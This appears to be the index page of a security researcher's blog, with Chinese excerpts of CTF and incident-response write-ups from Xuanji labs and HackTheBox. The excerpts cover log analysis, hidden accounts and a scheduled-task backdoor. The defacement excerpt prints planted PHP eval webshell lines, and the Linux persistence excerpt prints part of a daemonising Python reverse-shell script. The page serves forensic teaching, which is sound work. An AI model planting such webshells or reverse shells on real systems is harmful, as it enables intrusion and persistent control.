Hi, I'm GAiLO
Security Researcher & Developer — Looking for light.
-
玄机——windows实战-向日葵
右键定位向日葵文件位置,进入logs文件夹把日志文件拿出来,审计重心主要放在sunlogon文件上。 2024-03-26 10:15:38.534 - Info - [service][TcpAcceptor] new acceptor 192.168.31.45:64076-->192.168.31.114:49724 2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076, path: /, version: HTTP/1.1 2024-03-26 10:15:38.534 - Info - [Acceptor][HTTP] new RC HTTP connection 192.168.31.45:64076,/, plugin:, session: 2024-03-26 10:16:25.570...
-
玄机——windows实战-黑页&篡改
需要我们查找黑链添加在哪个文件中。快速定位到网站根目录,逐个查看文件内容。在/var/www/html下使用grep快速查找eval函数,我们就可以得到webshell的位置。 root@ip-10-0-10-1:/var/www/html# grep -rnE 'eval' . ./poc1.js:36: content.value = ('<?php @eval($_POST[a]); ?>\n') + oldData; ./usr/themes/default/404.php:2:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:3:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:4:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:5:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:6:<?php @eval($_POST[a]); ?> ./usr/themes/default/404.php:7:<?php @eval($_POST[a]); ?> 得到了webshell的位置。 root@ip-10-0-10-1:/var/www/html# grep -rnE '黑链' . ./usr/themes/default/header.php:24:<h3 style="text-align:center">模拟黑链</h3>...
-
HTB--Toolbox
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Sniper
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Broker
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
玄机——windows日志分析
暂不清楚步骤一的扫描次数是要全访问记录还是单纯的后台扫描记录。经审计后发现只需要 S:\tools\应急\windows日志分析 λ awk '{print $1}' access.log | sort | uniq -c 169 127.0.0.1 524 192.168.150.1 54 192.168.150.33 1 192.168.150.60 6331 192.168.150.67 审计日志发现33与67IP进行了扫描行为,故次数为二者相加。 我们先转向RDP爆破失败记录的查看。在security日志内查看4625事件ID的次数,发现对方一共爆破了2594次RDP账密。 再次查看4624事件ID,查看都有哪些IP成功登陆过此机器。发现其中掺杂很多reboot时各机器账户的登陆记录,无法直接查看。我们在FullEventLogView中添加字段筛选,指定进程名为C:\Windows\System32\winlogon.exe,就可以查看所有用户操作登陆记录了。 注意不要把最后自己登陆的IP也提交上去。然后我们需要查看黑客创建的隐藏账号。使用lusrmgr.msc先查看用户&组内是否有记录。发现有一个hacker$和一个hackers$账户。感觉这俩一个是影子账户一个是隐藏账户,反正交就完事了。 接下来我们需要审计机器上的远程shell程序连接IP+端口,我们先使用机器直接给的D盾查杀一下。没有杀出有效数据,我们转向查看任务计划程序,发现一个非常可疑的计划任务。 因为是自启动,我们可以在注册表的windows/run其中找到后门文件的具体位置,且SC计划任务程序列表中选择操作,可以看到是由C:\Windows\Zh-CN\download.bat执行的此文件,故定时执行的名称即为此。使用微步云沙箱分析后门文件即可得到连接地址&IP
-
HTB——Resolute
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
HTB——Perpection
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...
-
玄机——第五章-Windows实战-evtx文件分析
首先我们需要下载附件,并查看windows系统日志evtx文件。翻看security日志下的事件ID4624,我们可以得知黑客远程登录Windows的IP为192.168.36.133。注意windows登录日志记录的事件ID为4624&4625 黑客修改了登陆用户的用户名。我们需要查看security日志并尝试捕捉到修改后的用户名。这里打了一个小非预期。已知黑客大概率上线后会提权,我们直接查看分配特权的事件ID4672,在众多系统账户中找到一个可疑账户的权限分配。 正常的预期做法是查看4720、4722、4732,对应为创建用户账户、启用用户账户、向安全组内添加成员。注意4728是添加至全局组,4732是添加至本地组。 接下来审计恶意用户尝试访问的关键文件名称。我们转向事件ID4663,即试图访问对象的记录日志。这里有几个敏感文件都记录了位置,就需要我们猜一下了。 经尝试此文件即为我们要提交的目标文件名。 接下来需要我们审计最后一次重启数据库服务的进程ID号。转向应用程序日志,按时间排序并审计来源于Mysql的日志。除去12月的日志,10月日志最后一次mysql启动的日志如下 最后我们需要统计黑客上线后对系统执行的重启的次数。转向System日志,查询事件ID1074,统计后发现此恶意账户重启了两次电脑。 注意修改用户名后使用其用户第一次的reboot,日志并不会将其记录为该用户的reboot请求,而会记录为SYSTEM发起的windows更新请求。
-
玄机——Linux权限维持
首先查找隐藏文件信息。容易在tmp文件夹下找到一个隐藏的.temp文件夹,在其中有1.py和shell.py文件。查看1.py文件,可以得到黑客反弹shell的IP与对应端口。 root@xuanji:/tmp/.temp/libprocesshider# cat 1.py #!/usr/bin/python3 import socket,subprocess,os,sys, time pidrg = os.fork() if pidrg > 0: sys.exit(0) os.chdir("/") os.setsid() os.umask(0) drgpid = os.fork() if drgpid > 0: sys.exit(0) while 1: try: sys.stdout.flush() sys.stderr.flush() fdreg = open("/dev/null", "w") sys.stdout = fdreg sys.stderr...
-
HTB——Usage
0x01 信息收集 ┌──────────────────────────────────────────────┐ │ ___ _ │ │ / _ \ ___ ___ _ __ __ _ ___| | __ │ │ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │ │ / /_\\_____\__ \ (__| | |...
-
HTB——Aero
0x01 信息收集 _____ ___ _ /__ \ ___ ___ __ _ _ __ / _ \| | _ _ ___ / /\// __| / __| / _' || '_ \ / /_)/| || | | |/ __| / / \__...